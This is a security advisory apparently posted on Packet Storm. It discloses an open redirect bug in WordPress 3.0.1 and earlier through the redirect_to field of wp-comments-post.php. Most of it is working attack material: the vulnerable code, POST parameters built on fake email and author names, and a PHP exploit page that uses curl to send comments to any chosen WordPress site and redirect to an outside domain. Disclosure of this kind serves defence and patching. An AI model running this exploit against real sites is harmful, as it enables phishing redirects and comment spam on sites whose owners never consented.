WordPress versions 3.0.1 and below suffer from an URL redirection bug.
e65e12163ee044a64fbf4b4115b4c734#Title: WordPress (Version 3.0.1 And Prior) Url Redirection Bug
#Vendor: http://wordpress.org/download/
######################################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability65.htm
#Thanks: Amin Shokohi(Pejvak),M3hr@n$,r3dm0v3,am!rkh@n Particular
Hookah(Dosib) :D
######################################################################
Poc : line 94-98 wordpress/wp-comments-post.php
$location = empty($_POST['redirect_to']) ? get_comment_link($comment_id) :
$_POST['redirect_to'] . '#comment-' . $comment_id;
*Varible $location equal $_POST['redirect_to']*
$location = apply_filters('comment_post_redirect', $location, $comment);
*Function Redirect Wordpress*
wp_redirect($location);
*Redirect To Varible $location*
######################################################################
Poc 2 : Usage
This Bug Worked In Request Post
Post :
comment_post_ID=1 //Post Id If Is Wrong Buf Not Worked
email=emal@yahoo.com //Fake Email Address
author=pejipeji //Fake Author Name
comment=Hi //Fake Comment
redirect_to=http://www.itsecteam.com //Url Adddress For Redirect
######################################################################
*Note : if post_ID Wrong Bug Not Worked
######################################################################
#Bug : http://localhost/wordpress/wp-comments-post.php
######################################################################
Exploit For Test :
<?php
echo "<b><center>Wordpress Vulnerability Url Redirection
Test<br>ItSecTeam.com<br></b><form action=".$_SERVER['PHP_SELF']."
method=post>Url : <input type=text size=50 value=http://www. name=url>
<input type=submit Value=' Send Request '></center></form>";
if($_POST['url']){
$ch = curl_init($_POST['url']."/wp-comments-post.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,
"comment_post_ID=1&email=pejipeji".rand(1,9999)."@yahoo.com&author=pejipeji".rand(1,9999)."&comment=Hi".rand(1,9999)."&redirect_to=http://www.itsecteam.com");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
$info=null;
$info =curl_getinfo($ch);
echo $info['url'];
}
?>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!